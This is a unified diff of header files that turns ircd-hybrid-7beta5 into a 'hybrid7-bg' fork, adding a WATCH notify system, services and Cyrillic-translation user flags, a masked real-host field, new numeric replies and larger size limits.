diff -uNrd ircd-hybrid-7beta5/include/client.h hybrid7-bg/include/client.h
--- ircd-hybrid-7beta5/include/client.h	Wed May  9 04:08:16 2001
+++ hybrid7-bg/include/client.h	Wed Jul 24 09:13:18 2002
@@ -17,7 +17,7 @@
  *   Foundation, Inc., 675 Mass Ave, Cambridge, MA 02139, USA.
  *
  *
- * $Id: client.h,v 7.110 2001/05/09 08:08:16 a1kmm Exp $
+ * $Id: client.h,v 1.13 2002/07/24 13:13:18 Administrator Exp $
  */
 #ifndef INCLUDED_client_h
 #define INCLUDED_client_h
@@ -71,6 +71,47 @@
 struct Client;
 struct LocalUser;
 
+struct Repeat {
+
+	struct Channel *chptr;		/* last phrase block */
+	char *text;
+	time_t lastphrase;
+};
+
+struct SLink;
+struct Watch;
+
+typedef struct Client aClient;
+typedef struct Channel aChannel;
+typedef struct ConfItem aConfItem;
+/*typedef struct Ban aBan;*/
+typedef struct Watch aWatch;
+
+typedef struct SLink Link;
+
+struct SLink 
+{
+    struct SLink *next;
+    union
+    {
+	aClient    *cptr;
+	aChannel   *chptr;
+	aConfItem  *aconf;
+	aBan       *banptr;
+	aWatch *wptr;
+	char       *cp;
+    } value;
+    int         flags;
+};
+
+struct Watch 
+{
+    aWatch  *hnext;
+    time_t   lasttime;
+    Link  *watch;
+    char  nick[1];
+};
+
 /*
  * Client structures
  */
@@ -79,6 +120,9 @@
   struct User*   next;          /* chain of anUser structures */
   dlink_list     channel;       /* chain of channel pointer blocks */
   dlink_list     invited;       /* chain of invite pointer blocks */
+
+  dlink_list	repeat;			/* chain of last phrases per channel blocks */
+
   char*          away;          /* pointer to away message */
   time_t         last_away;     /* Away since... */
   time_t         last;
@@ -92,6 +136,7 @@
   char id_key[IDLEN + 1];
   /* When did we detach from them, if they are detached... */
   time_t            last_detach_time;
+  int known;	/* USER came from particular type of client */
 };
 
 struct Server
@@ -136,6 +181,9 @@
   unsigned int      umodes;     /* opers, normal users subset */
   unsigned int      flags;      /* client flags */
   unsigned int      flags2;     /* ugh. overflow */
+
+  unsigned int      svsflags;   /* services flags */
+
   int               fd;         /* >= 0, for local clients */
   int 		    zipfd;	/* For ZipLinks. This is actually the network fd, rather than the fd to the zip
   				 * process. This way all of the code just reads and writes from the ziplink process.
@@ -176,6 +224,17 @@
    */
   char              host[HOSTLEN + 1];     /* client's hostname */
   /*
+   * this contains client's real host, whereas host[] field
+   * is modified (in register_local_user) to store masked hostname
+   *                                                     -demond
+   */
+  char          realhost[HOSTLEN + 1];
+  /*
+   * this contains client's IP, sent by CAP_IP-able server
+   *                                                     -demond
+   */
+  char          ip[HOSTLEN + 1];
+  /*
    * client->info for unix clients will normally contain the info from the 
    * gcos field in /etc/passwd but anything can go here.
    */
@@ -194,6 +253,9 @@
   dlink_list	allow_list;	/* clients I'll allow to talk to me */
   dlink_list	on_allow_list;	/* clients that have =me= on their allow list*/
 
+  Link *watch;
+  int watches;
+
   struct LocalUser *localClient;
 };
 
@@ -375,16 +437,25 @@
 #define FLAGS_INVISIBLE    0x0400 /* makes user invisible */
 #define FLAGS_BOTS         0x0800 /* shows bots */
 #define FLAGS_EXTERNAL     0x1000 /* show servers introduced and splitting */
+
+#define FLAGS_REMOTE       0x2000 /* Remote client registering */
+
 #define FLAGS_CALLERID     0x4000 /* block unless caller id's */
 #define FLAGS_UNAUTH       0x8000 /* show unauth connects here */
 #define FLAGS_DRONE        0x10000 /* show drone connects */
 #define FLAGS_LOCOPS       0x20000 /* show locops */
+
 #define FLAGS_PERSISTANT   0x100000 /* persist on close. */
+#define FLAGS_TRANSWIN     0x200000 /* translate cyrillic Windows-1251 */
+#define FLAGS_TRANSISO     0x400000 /* translate cyrillic ISO-8859-5 */
+#define FLAGS_REGACCEPT    0x800000 /* accepting from reg nicks only */
 
 /* user information flags, only settable by remote mode or local oper */
 #define FLAGS_OPER         0x40000 /* Operator */
 #define FLAGS_ADMIN        0x80000 /* Admin on server */
 
+#define FLAGS_SVS_IDENT    0x0001  /* client has identified with services */
+#define FLAGS_SVS_ADMIN    0x0002  /* client has identified as services admin */
 
 #define FLAGS_ALL	   FLAGS_SERVNOTICE
 #define FLAGS_NOTADMIN     FLAGS_OPER
@@ -432,8 +503,9 @@
                       FLAGS_REJ | FLAGS_SKILL | FLAGS_FULL | FLAGS_SPY | \
                       FLAGS_NCHANGE | FLAGS_OPERWALL | FLAGS_DEBUG | \
                       FLAGS_BOTS | FLAGS_EXTERNAL | FLAGS_DRONE | \
- 		      FLAGS_ADMIN | FLAGS_UNAUTH | FLAGS_CALLERID | \
-                      FLAGS_LOCOPS | FLAGS_PERSISTANT)
+ 				      FLAGS_ADMIN | FLAGS_UNAUTH | FLAGS_CALLERID | \
+                      FLAGS_LOCOPS | FLAGS_PERSISTANT | FLAGS_REMOTE | \
+                      FLAGS_TRANSWIN | FLAGS_TRANSISO | FLAGS_REGACCEPT)
 
 #define FLAGS_ID     (FLAGS_NEEDID | FLAGS_GOTID)
 
@@ -488,6 +560,15 @@
 #define SetCallerId(x)		((x)->umodes |= FLAGS_CALLERID)
 #define IsSetCallerId(x)	((x)->umodes & FLAGS_CALLERID)
 
+#define SendRemoteNotice(x)		((x)->umodes & FLAGS_REMOTE)
+
+#define SetTransWin(x)          ((x)->umodes |= FLAGS_TRANSWIN)
+#define IsSetTransWin(x)        ((x)->umodes & FLAGS_TRANSWIN)
+#define SetTransISO(x)          ((x)->umodes |= FLAGS_TRANSISO)
+#define IsSetTransISO(x)        ((x)->umodes & FLAGS_TRANSISO)
+#define SetRegAccept(x)         ((x)->umodes |= FLAGS_REGACCEPT)
+#define IsSetRegAccept(x)       ((x)->umodes & FLAGS_REGACCEPT)
+
 #define SetIpHash(x)            ((x)->flags |= FLAGS_IPHASH)
 #define ClearIpHash(x)          ((x)->flags &= ~FLAGS_IPHASH)
 #define IsIpHash(x)             ((x)->flags & FLAGS_IPHASH)
@@ -590,6 +671,19 @@
 extern int change_local_nick(struct Client *client_p, struct Client *source_p,
                              char *nick);
 extern int clean_nick_name(char* nick);
+
+extern char *translate(struct Client *client_p, char *buf);
+
+#define WATCHHASHSIZE U_MAX/16		/* reasonable for bnet i think... -demond */
+
+extern void 	  count_watch_memory(int *, u_long *);
+extern void    	  clear_watch_hash_table(void);
+extern int     	  add_to_watch_hash_table(char *, aClient *);
+extern int     	  del_from_watch_hash_table(char *, aClient *);
+extern int     	  hash_check_watch(aClient *, int);
+extern int     	  hash_del_watch_list(aClient  *);
+extern aWatch 	 *hash_get_watch(char *);
+#define MAXWATCH       128
 
 #endif /* INCLUDED_client_h */
 
diff -uNrd ircd-hybrid-7beta5/include/common.h hybrid7-bg/include/common.h
--- ircd-hybrid-7beta5/include/common.h	Sun Jan 23 16:02:35 2000
+++ hybrid7-bg/include/common.h	Tue Jun  5 12:35:43 2001
@@ -16,7 +16,7 @@
  *   along with this program; if not, write to the Free Software
  *   Foundation, Inc., 675 Mass Ave, Cambridge, MA 02139, USA.
  *
- * $Id: common.h,v 7.2 2000/01/23 21:02:35 db Exp $
+ * $Id: common.h,v 1.1.1.1 2001/06/05 16:35:43 demond Exp $
  */
 #ifndef INCLUDED_common_h
 #define INCLUDED_common_h
diff -uNrd ircd-hybrid-7beta5/include/config.h hybrid7-bg/include/config.h
--- ircd-hybrid-7beta5/include/config.h	Sat May  5 09:37:32 2001
+++ hybrid7-bg/include/config.h	Tue Jun  5 12:35:43 2001
@@ -16,7 +16,7 @@
  *   along with this program; if not, write to the Free Software
  *   Foundation, Inc., 675 Mass Ave, Cambridge, MA 02139, USA.
  *
- * $Id: config.h,v 7.107 2001/05/05 13:37:32 fl_ Exp $
+ * $Id: config.h,v 1.1.1.1 2001/06/05 16:35:43 demond Exp $
  */
 #ifndef INCLUDED_config_h
 #define INCLUDED_config_h
diff -uNrd ircd-hybrid-7beta5/include/config.h.dist hybrid7-bg/include/config.h.dist
--- ircd-hybrid-7beta5/include/config.h.dist	Mon May  7 11:50:29 2001
+++ hybrid7-bg/include/config.h.dist	Tue Jun  5 12:35:43 2001
@@ -16,7 +16,7 @@
  *   along with this program; if not, write to the Free Software
  *   Foundation, Inc., 675 Mass Ave, Cambridge, MA 02139, USA.
  *
- * $Id: config.h.dist,v 7.44 2001/05/07 15:50:29 toot Exp $
+ * $Id: config.h.dist,v 1.1.1.1 2001/06/05 16:35:43 demond Exp $
  */
 #ifndef INCLUDED_config_h
 #define INCLUDED_config_h
diff -uNrd ircd-hybrid-7beta5/include/dline_conf.h hybrid7-bg/include/dline_conf.h
--- ircd-hybrid-7beta5/include/dline_conf.h	Mon Apr  9 11:13:57 2001
+++ hybrid7-bg/include/dline_conf.h	Tue Jun  5 12:35:43 2001
@@ -1,6 +1,6 @@
 /* dline_conf.h  -- lets do dlines right shall we?
  *
- * $Id: dline_conf.h,v 7.13 2001/04/09 15:13:57 davidt Exp $ 
+ * $Id: dline_conf.h,v 1.1.1.1 2001/06/05 16:35:43 demond Exp $ 
  */
 
 #ifndef INCLUDED_dline_conf_h
diff -uNrd ircd-hybrid-7beta5/include/event.h hybrid7-bg/include/event.h
--- ircd-hybrid-7beta5/include/event.h	Thu Apr 19 18:29:37 2001
+++ hybrid7-bg/include/event.h	Tue Jun  5 12:35:43 2001
@@ -2,7 +2,7 @@
  * event.h - defines for event.c, the event system. This has been ported
  * from squid by adrian to simplify scheduling events.
  *
- * $Id: event.h,v 1.7 2001/04/19 22:29:37 a1kmm Exp $
+ * $Id: event.h,v 1.1.1.1 2001/06/05 16:35:43 demond Exp $
  */
 #ifndef __EVENT_H__
 #define __EVENT_H__
diff -uNrd ircd-hybrid-7beta5/include/fdlist.h hybrid7-bg/include/fdlist.h
--- ircd-hybrid-7beta5/include/fdlist.h	Mon Mar  5 21:22:08 2001
+++ hybrid7-bg/include/fdlist.h	Tue Jun  5 12:35:43 2001
@@ -1,7 +1,7 @@
 /*
  * fdlist.h
  *
- * $Id: fdlist.h,v 7.19 2001/03/06 02:22:08 androsyn Exp $
+ * $Id: fdlist.h,v 1.1.1.1 2001/06/05 16:35:43 demond Exp $
  */
 #ifndef INCLUDED_fdlist_h
 #define INCLUDED_fdlist_h
diff -uNrd ircd-hybrid-7beta5/include/fileio.h hybrid7-bg/include/fileio.h
--- ircd-hybrid-7beta5/include/fileio.h	Fri Mar 23 05:47:56 2001
+++ hybrid7-bg/include/fileio.h	Tue Jun  5 12:35:43 2001
@@ -16,7 +16,7 @@
  *   Foundation, Inc., 675 Mass Ave, Cambridge, MA 02139, USA.
  *
  *
- * $Id: fileio.h,v 7.7 2001/03/23 10:47:56 ejb Exp $
+ * $Id: fileio.h,v 1.1.1.1 2001/06/05 16:35:43 demond Exp $
  */
 #ifndef INCLUDED_fileio_h
 #define INCLUDED_fileio_h
diff -uNrd ircd-hybrid-7beta5/include/handlers.h hybrid7-bg/include/handlers.h
--- ircd-hybrid-7beta5/include/handlers.h	Mon Mar  5 21:22:08 2001
+++ hybrid7-bg/include/handlers.h	Tue Jun  5 12:35:43 2001
@@ -17,7 +17,7 @@
  * along with this program; if not, write to the Free Software
  * Foundation, Inc., 675 Mass Ave, Cambridge, MA 02139, USA.
  *
- * $Id: handlers.h,v 7.36 2001/03/06 02:22:08 androsyn Exp $
+ * $Id: handlers.h,v 1.1.1.1 2001/06/05 16:35:43 demond Exp $
  */
 #ifndef INCLUDED_handlers_h
 #define INCLUDED_handlers_h
diff -uNrd ircd-hybrid-7beta5/include/hash.h hybrid7-bg/include/hash.h
--- ircd-hybrid-7beta5/include/hash.h	Mon Mar  5 21:04:57 2001
+++ hybrid7-bg/include/hash.h	Sun Nov  4 16:07:08 2001
@@ -16,7 +16,7 @@
  *   along with this program; if not, write to the Free Software
  *   Foundation, Inc., 675 Mass Ave, Cambridge, MA 02139, USA.
  *
- *   $Id: hash.h,v 7.8 2001/03/06 02:04:57 androsyn Exp $
+ *   $Id: hash.h,v 1.3 2001/11/04 21:07:08 demond Exp $
  */
 #ifndef INCLUDED_hash_h
 #define INCLUDED_hash_h
@@ -49,11 +49,18 @@
 };
 
 struct Client *hash_find_id(const char *name, struct Client *client_p);
+
+extern int services_present(void);
+extern struct Client* find_services(void);
+
 extern int add_to_id_hash_table(char *, struct Client *);
 extern struct HashEntry hash_get_channel_block(int i);
 extern size_t hash_get_client_table_size(void);
 extern size_t hash_get_channel_table_size(void);
 extern void   init_hash(void);
+
+extern void   clear_svs_client_hash_table(void);
+
 extern void   add_to_client_hash_table(const char* name, 
                                        struct Client* client);
 extern void   del_from_client_hash_table(const char* name, 
diff -uNrd ircd-hybrid-7beta5/include/hostmask.h hybrid7-bg/include/hostmask.h
--- ircd-hybrid-7beta5/include/hostmask.h	Mon May  7 17:27:11 2001
+++ hybrid7-bg/include/hostmask.h	Mon Jul  2 00:10:33 2001
@@ -15,7 +15,7 @@
  *  You should have received a copy of the GNU General Public License
  *  along with this program; if not, write to the Free Software
  *  Foundation, Inc., 59 Temple Place - Suite 330, Boston, MA 02111-1307, USA.
- * $Id: hostmask.h,v 1.12 2001/05/07 21:27:11 fl_ Exp $ 
+ * $Id: hostmask.h,v 1.2 2001/07/02 04:10:33 demond Exp $ 
  */
 
 enum
@@ -40,13 +40,13 @@
 int match_ipv6(struct irc_inaddr*, struct irc_inaddr*, int);
 int match_ipv4(struct irc_inaddr*, struct irc_inaddr*, int);
 struct ConfItem* find_conf_by_address(const char*, struct irc_inaddr*,
-                                      int, int, const char*);
+                                      int, int, const char*, char *);
 void add_conf_by_address(const char*, int, const char*, struct ConfItem*);
 void delete_one_address_conf(const char*, struct ConfItem*);
 void clear_out_address_conf(void);
 void init_host_hash(void);
 struct ConfItem* find_address_conf(const char*, const char*,
-                                   struct irc_inaddr*, int);
+                                   struct irc_inaddr*, int, char *);
 struct ConfItem* find_dline(struct irc_inaddr *, int);
 
 void report_dlines(struct Client*);
diff -uNrd ircd-hybrid-7beta5/include/irc_string.h hybrid7-bg/include/irc_string.h
--- ircd-hybrid-7beta5/include/irc_string.h	Wed Mar 14 16:50:04 2001
+++ hybrid7-bg/include/irc_string.h	Tue Jun  5 12:35:43 2001
@@ -16,7 +16,7 @@
  *   along with this program; if not, write to the Free Software
  *   Foundation, Inc., 675 Mass Ave, Cambridge, MA 02139, USA.
  *
- *   $Id: irc_string.h,v 7.16 2001/03/14 21:50:04 androsyn Exp $
+ *   $Id: irc_string.h,v 1.1.1.1 2001/06/05 16:35:43 demond Exp $
  */
 #ifndef INCLUDED_irc_string_h
 #define INCLUDED_irc_string_h
diff -uNrd ircd-hybrid-7beta5/include/ircd.h hybrid7-bg/include/ircd.h
--- ircd-hybrid-7beta5/include/ircd.h	Thu May 10 02:30:39 2001
+++ hybrid7-bg/include/ircd.h	Tue Jun  5 12:35:44 2001
@@ -19,7 +19,7 @@
  *
  * "ircd.h". - Headers file.
  *
- * $Id: ircd.h,v 7.31 2001/05/10 06:30:39 a1kmm Exp $
+ * $Id: ircd.h,v 1.1.1.1 2001/06/05 16:35:44 demond Exp $
  *
  */
 #ifndef INCLUDED_ircd_h
diff -uNrd ircd-hybrid-7beta5/include/ircd_defs.h hybrid7-bg/include/ircd_defs.h
--- ircd-hybrid-7beta5/include/ircd_defs.h	Wed Mar 28 00:50:09 2001
+++ hybrid7-bg/include/ircd_defs.h	Fri Jul 19 00:21:48 2002
@@ -17,7 +17,7 @@
  *   Foundation, Inc., 675 Mass Ave, Cambridge, MA 02139, USA.
  *
  *
- * $Id: ircd_defs.h,v 7.19 2001/03/28 05:50:09 db Exp $
+ * $Id: ircd_defs.h,v 1.5 2002/07/19 04:21:48 Administrator Exp $
  *
  * ircd_defs.h - Global size definitions for record entries used
  * througout ircd. Please think 3 times before adding anything to this
@@ -32,24 +32,26 @@
 #  error Incorrect config.h for this revision of ircd.
 #endif
 
+#define BUFMAX			0x100
+
 #define HOSTLEN         63      /* Length of hostname.  Updated to         */
                                 /* comply with RFC1123                     */
 
-#define NICKLEN         9       /* Necessary to put 9 here instead of 10
+#define NICKLEN         15      /* Necessary to put 9 here instead of 10
                                  * if s_msg.c/m_nick has been corrected.
                                  * This preserves compatibility with old
                                  * servers --msa
                                  */
 #define USERLEN         10
 #define REALLEN         50
-#define TOPICLEN        120     /* old value 90, truncated on other servers */
+#define TOPICLEN        150     /* old value 90, truncated on other servers */
 #define KILLLEN         90      
 #define CHANNELLEN      200
 #define KEYLEN          23
 #define BUFSIZE         512     /* WARNING: *DONT* CHANGE THIS!!!! */
 #define MAXRECIPIENTS   20
-#define MAXBANS         25      /* bans + exceptions together */
-#define MAXBANLENGTH    1024
+#define MAXBANS         40      /* bans + exceptions + subst words together */
+#define MAXBANLENGTH    512
 
 #define OPERWALL_LEN    400     /* can be truncated on other servers */
 
@@ -62,6 +64,8 @@
 #define CLIENT_EXITED    -2
 #define CLIENT_PARSE_ERROR -1
 #define CLIENT_OK	1
+
+#define BUFFMAX			BUFSIZE
 
 /* 
  * Macros everyone uses :/ moved here from sys.h
diff -uNrd ircd-hybrid-7beta5/include/ircd_handler.h hybrid7-bg/include/ircd_handler.h
--- ircd-hybrid-7beta5/include/ircd_handler.h	Mon Mar  5 21:22:09 2001
+++ hybrid7-bg/include/ircd_handler.h	Tue Jun  5 12:35:44 2001
@@ -17,7 +17,7 @@
  * along with this program; if not, write to the Free Software
  * Foundation, Inc., 675 Mass Ave, Cambridge, MA 02139, USA.
  *
- * $Id: ircd_handler.h,v 7.4 2001/03/06 02:22:09 androsyn Exp $
+ * $Id: ircd_handler.h,v 1.1.1.1 2001/06/05 16:35:44 demond Exp $
  */
 #ifndef INCLUDED_ircd_handler_h
 #define INCLUDED_ircd_handler_h
diff -uNrd ircd-hybrid-7beta5/include/ircd_signal.h hybrid7-bg/include/ircd_signal.h
--- ircd-hybrid-7beta5/include/ircd_signal.h	Thu Dec 30 15:35:30 1999
+++ hybrid7-bg/include/ircd_signal.h	Tue Jun  5 12:35:44 2001
@@ -17,7 +17,7 @@
  *   Foundation, Inc., 675 Mass Ave, Cambridge, MA 02139, USA.
  *
  *
- * $Id: ircd_signal.h,v 7.1 1999/12/30 20:35:30 db Exp $
+ * $Id: ircd_signal.h,v 1.1.1.1 2001/06/05 16:35:44 demond Exp $
  *
  */
 #ifndef INCLUDED_ircd_signal_h
diff -uNrd ircd-hybrid-7beta5/include/ircdauth.h hybrid7-bg/include/ircdauth.h
--- ircd-hybrid-7beta5/include/ircdauth.h	Fri Dec 29 23:36:53 2000
+++ hybrid7-bg/include/ircdauth.h	Tue Jun  5 12:35:44 2001
@@ -16,7 +16,7 @@
  *   along with this program; if not, write to the Free Software
  *   Foundation, Inc., 675 Mass Ave, Cambridge, MA 02139, USA.
  *
- * $Id: ircdauth.h,v 7.4 2000/12/30 04:36:53 lusky Exp $
+ * $Id: ircdauth.h,v 1.1.1.1 2001/06/05 16:35:44 demond Exp $
  */
 
 #ifndef INCLUDED_ircdauth_h
diff -uNrd ircd-hybrid-7beta5/include/list.h hybrid7-bg/include/list.h
--- ircd-hybrid-7beta5/include/list.h	Thu May 10 02:30:39 2001
+++ hybrid7-bg/include/list.h	Tue Jun  5 12:35:44 2001
@@ -20,7 +20,7 @@
  * "list.h". - Headers file.
  *
  *
- * $Id: list.h,v 7.11 2001/05/10 06:30:39 a1kmm Exp $
+ * $Id: list.h,v 1.1.1.1 2001/06/05 16:35:44 demond Exp $
  *
  */
 
diff -uNrd ircd-hybrid-7beta5/include/listener.h hybrid7-bg/include/listener.h
--- ircd-hybrid-7beta5/include/listener.h	Mon Feb 26 01:53:46 2001
+++ hybrid7-bg/include/listener.h	Tue Jun  5 12:35:44 2001
@@ -16,7 +16,7 @@
  *   Foundation, Inc., 675 Mass Ave, Cambridge, MA 02139, USA.
  *
  *
- * $Id: listener.h,v 7.7 2001/02/26 06:53:46 androsyn Exp $
+ * $Id: listener.h,v 1.1.1.1 2001/06/05 16:35:44 demond Exp $
  */
 #ifndef INCLUDED_listener_h
 #define INCLUDED_listener_h
diff -uNrd ircd-hybrid-7beta5/include/m_info.h hybrid7-bg/include/m_info.h
--- ircd-hybrid-7beta5/include/m_info.h	Mon Mar 19 04:59:55 2001
+++ hybrid7-bg/include/m_info.h	Tue Jun  5 12:35:44 2001
@@ -16,7 +16,7 @@
  *   along with this program; if not, write to the Free Software
  *   Foundation, Inc., 675 Mass Ave, Cambridge, MA 02139, USA.
  *
- * $Id: m_info.h,v 7.29 2001/03/19 09:59:55 toot Exp $
+ * $Id: m_info.h,v 1.1.1.1 2001/06/05 16:35:44 demond Exp $
  */
 #ifndef INCLUDED_m_info_h
 #define INCLUDED_m_info_h
diff -uNrd ircd-hybrid-7beta5/include/m_kline.h hybrid7-bg/include/m_kline.h
--- ircd-hybrid-7beta5/include/m_kline.h	Tue Mar 13 15:38:20 2001
+++ hybrid7-bg/include/m_kline.h	Tue Jun  5 12:35:44 2001
@@ -16,7 +16,7 @@
  *   along with this program; if not, write to the Free Software
  *   Foundation, Inc., 675 Mass Ave, Cambridge, MA 02139, USA.
  *
- * $Id: m_kline.h,v 7.6 2001/03/13 20:38:20 fl_ Exp $
+ * $Id: m_kline.h,v 1.1.1.1 2001/06/05 16:35:44 demond Exp $
  */
 #ifndef INCLUDED_m_kline_h
 #define INCLUDED_m_kline_h
diff -uNrd ircd-hybrid-7beta5/include/memory.h hybrid7-bg/include/memory.h
--- ircd-hybrid-7beta5/include/memory.h	Sat Apr 21 12:01:40 2001
+++ hybrid7-bg/include/memory.h	Tue Jun  5 12:35:44 2001
@@ -1,4 +1,4 @@
-/* $Id: memory.h,v 7.15 2001/04/21 16:01:40 toot Exp $ */
+/* $Id: memory.h,v 1.1.1.1 2001/06/05 16:35:44 demond Exp $ */
 
 #ifndef _I_MEMORY_H
 #define _I_MEMORY_H
diff -uNrd ircd-hybrid-7beta5/include/modules.h hybrid7-bg/include/modules.h
--- ircd-hybrid-7beta5/include/modules.h	Wed Apr  4 12:17:38 2001
+++ hybrid7-bg/include/modules.h	Wed Jul 24 09:08:17 2002
@@ -16,7 +16,7 @@
  *   along with this program; if not, write to the Free Software
  *   Foundation, Inc., 675 Mass Ave, Cambridge, MA 02139, USA.
  *
- * $Id: modules.h,v 7.17 2001/04/04 16:17:38 androsyn Exp $
+ * $Id: modules.h,v 1.5 2002/07/24 13:08:17 Administrator Exp $
  */
 
 #ifndef INCLUDED_modules_h
@@ -76,6 +76,7 @@
 extern struct Message cjoin_msgtab;
 extern struct Message client_msgtab;
 extern struct Message close_msgtab;
+extern struct Message conf_msgtab;
 extern struct Message connect_msgtab;
 extern struct Message die_msgtab;
 extern struct Message dmem_msgtab;
@@ -122,6 +123,8 @@
 extern struct Message squit_msgtab;
 extern struct Message stats_msgtab;
 extern struct Message svinfo_msgtab;
+extern struct Message svsnick_msgtab;
+extern struct Message svshint_msgtab;
 extern struct Message testline_msgtab;
 extern struct Message time_msgtab;
 extern struct Message topic_msgtab;
@@ -132,6 +135,7 @@
 extern struct Message users_msgtab;
 extern struct Message version_msgtab;
 extern struct Message wallops_msgtab;
+extern struct Message watch_msgtab;
 extern struct Message who_msgtab;
 extern struct Message whois_msgtab;
 extern struct Message whowas_msgtab;
diff -uNrd ircd-hybrid-7beta5/include/motd.h hybrid7-bg/include/motd.h
--- ircd-hybrid-7beta5/include/motd.h	Sun Jan 21 23:18:17 2001
+++ hybrid7-bg/include/motd.h	Tue Jun  5 12:35:44 2001
@@ -1,7 +1,7 @@
 /*
  * motd.h
  *
- * $Id: motd.h,v 7.5 2001/01/22 04:18:17 lusky Exp $
+ * $Id: motd.h,v 1.1.1.1 2001/06/05 16:35:44 demond Exp $
  */
 #ifndef INCLUDED_motd_h
 #define INCLUDED_motd_h
diff -uNrd ircd-hybrid-7beta5/include/msg.h hybrid7-bg/include/msg.h
--- ircd-hybrid-7beta5/include/msg.h	Mon Mar  5 21:22:09 2001
+++ hybrid7-bg/include/msg.h	Wed Sep 18 19:19:45 2002
@@ -17,7 +17,7 @@
  *   along with this program; if not, write to the Free Software
  *   Foundation, Inc., 675 Mass Ave, Cambridge, MA 02139, USA.
  *
- * $Id: msg.h,v 7.38 2001/03/06 02:22:09 androsyn Exp $
+ * $Id: msg.h,v 1.2 2002/09/17 15:24:46 Administrator Exp $
  */
 #ifndef INCLUDED_msg_h
 #define INCLUDED_msg_h
@@ -70,6 +70,6 @@
                                          * clients.                           */
 #define   MFLG_IGNORE            0x04   /* silently ignore command from
                                          * unregistered clients */
-#define MAXPARA    15 
+#define MAXPARA    32 
 
 #endif /* INCLUDED_msg_h */
diff -uNrd ircd-hybrid-7beta5/include/numeric.h hybrid7-bg/include/numeric.h
--- ircd-hybrid-7beta5/include/numeric.h	Mon Mar 12 01:36:54 2001
+++ hybrid7-bg/include/numeric.h	Wed Jul 24 09:08:17 2002
@@ -16,7 +16,7 @@
  *   along with this program; if not, write to the Free Software
  *   Foundation, Inc., 675 Mass Ave, Cambridge, MA 02139, USA.
  *
- * $Id: numeric.h,v 7.16 2001/03/12 06:36:54 a1kmm Exp $
+ * $Id: numeric.h,v 1.14 2002/07/24 13:08:17 Administrator Exp $
  */
 #ifndef INCLUDED_numeric_h
 #define INCLUDED_numeric_h
@@ -176,6 +176,11 @@
 #define RPL_STATSDLINE       225
 #define RPL_STATSALINE	     226
 
+#define RPL_STATSZLINE	     227
+#define RPL_EQUIVALENTS      228
+#define RPL_RELAYS           229
+#define RPL_USERPARMS        230
+
 #define RPL_SERVLIST         234
 #define RPL_SERVLISTEND      235
 
@@ -212,6 +217,8 @@
 
 /* numeric_replies */
 
+#define RPL_WHOISCYRILLIC    298 /* this nick is cyrillic-encoded */
+
 #define RPL_NONE             300
 #define RPL_AWAY             301
 #define RPL_USERHOST         302
@@ -241,6 +248,9 @@
 #define RPL_LISTEND          323
 #define RPL_CHANNELMODEIS    324
 
+#define RPL_WHOISSVSHINT     326 /* identified with services */
+#define RPL_WHOISREALHOST    327
+
 #define RPL_CREATIONTIME     329
 
 #define RPL_NOTOPIC          331
@@ -250,6 +260,8 @@
 #define RPL_INVITING         341
 #define RPL_SUMMONING        342
 
+#define RPL_SUBSTLIST		 344
+#define RPL_ENDOFSUBSTLIST   345
 #define RPL_INVITELIST       346
 #define RPL_ENDOFINVITELIST  347
 #define RPL_EXCEPTLIST       348
@@ -328,6 +340,7 @@
 #define ERR_USERSDISABLED    446
 
 #define ERR_NOTREGISTERED    451
+#define ERR_NOREPEATING      452
 
 #define ERR_NEEDMOREPARAMS   461
 #define ERR_ALREADYREGISTRED 462
@@ -337,6 +350,10 @@
 #define ERR_YOUWILLBEBANNED  466
 #define ERR_KEYSET           467
 
+#define ERR_CANNOTSENDNOTREG 468	/* only reg nicks may speak */
+#define ERR_REGNICKSCHAN     469        /* channel is for reg nicks only */
+#define ERR_NOCYRNICKCHAN    470        /* no cyrillic nicks allowed */ 
+
 #define ERR_CHANNELISFULL    471
 #define ERR_UNKNOWNMODE      472
 #define ERR_INVITEONLYCHAN   473
@@ -353,14 +370,31 @@
 #define ERR_RESTRICTED       484
 #define ERR_BANNEDNICK       485
 
+#define ERR_CANTKICKSERVICES 486
+#define ERR_CANTDEOPSERVICES 487
+
 #define ERR_NOOPERHOST       491
 
+#define ERR_REGACCEPTONLY    499        /* accepting from reg nicks only */
+
+#define ERR_TOOMANYWATCH     500
+
 #define ERR_UMODEUNKNOWNFLAG 501
 #define ERR_USERSDONTMATCH   502
 
 #define ERR_GHOSTEDCLIENT    503
 
 #define ERR_USERNOTONSERV    504
-#define ERR_LAST_ERR_MSG     505
+
+#define RPL_LOGON            600
+#define RPL_LOGOFF           601
+#define RPL_WATCHOFF         602
+#define RPL_WATCHSTAT        603
+#define RPL_NOWON            604
+#define RPL_NOWOFF           605
+#define RPL_WATCHLIST        606
+#define RPL_ENDOFWATCHLIST   607
+
+#define ERR_LAST_ERR_MSG     608
 
 #endif /* INCLUDED_numeric_h */
diff -uNrd ircd-hybrid-7beta5/include/packet.h hybrid7-bg/include/packet.h
--- ircd-hybrid-7beta5/include/packet.h	Thu Apr 19 03:38:07 2001
+++ hybrid7-bg/include/packet.h	Tue Jun  5 12:35:44 2001
@@ -19,7 +19,7 @@
  *
  * "packet.h". - Headers file.
  *
- * $Id: packet.h,v 7.10 2001/04/19 07:38:07 a1kmm Exp $
+ * $Id: packet.h,v 1.1.1.1 2001/06/05 16:35:44 demond Exp $
  *
  */
 #ifndef INCLUDED_packet_h
diff -uNrd ircd-hybrid-7beta5/include/parse.h hybrid7-bg/include/parse.h
--- ircd-hybrid-7beta5/include/parse.h	Mon Feb  5 15:12:30 2001
+++ hybrid7-bg/include/parse.h	Tue Jun  5 12:35:44 2001
@@ -20,7 +20,7 @@
  * "parse.h". - Headers file.
  *
  *
- * $Id: parse.h,v 7.13 2001/02/05 20:12:30 davidt Exp $
+ * $Id: parse.h,v 1.1.1.1 2001/06/05 16:35:44 demond Exp $
  *
  */
 #ifndef INCLUDED_parse_h_h
diff -uNrd ircd-hybrid-7beta5/include/patchlevel.h hybrid7-bg/include/patchlevel.h
--- ircd-hybrid-7beta5/include/patchlevel.h	Thu May 17 22:33:27 2001
+++ hybrid7-bg/include/patchlevel.h	Sat Jun 16 21:24:16 2001
@@ -17,5 +17,5 @@
  */
 
 #ifndef PATCHLEVEL
-#define PATCHLEVEL    "hybrid-7beta5"
+#define PATCHLEVEL    "hybrid-7beta5-bg"
 #endif
diff -uNrd ircd-hybrid-7beta5/include/patricia.h hybrid7-bg/include/patricia.h
--- ircd-hybrid-7beta5/include/patricia.h	Mon Apr  9 11:13:57 2001
+++ hybrid7-bg/include/patricia.h	Tue Jun  5 12:35:44 2001
@@ -1,5 +1,5 @@
 /*
- * $Id: patricia.h,v 7.8 2001/04/09 15:13:57 davidt Exp $
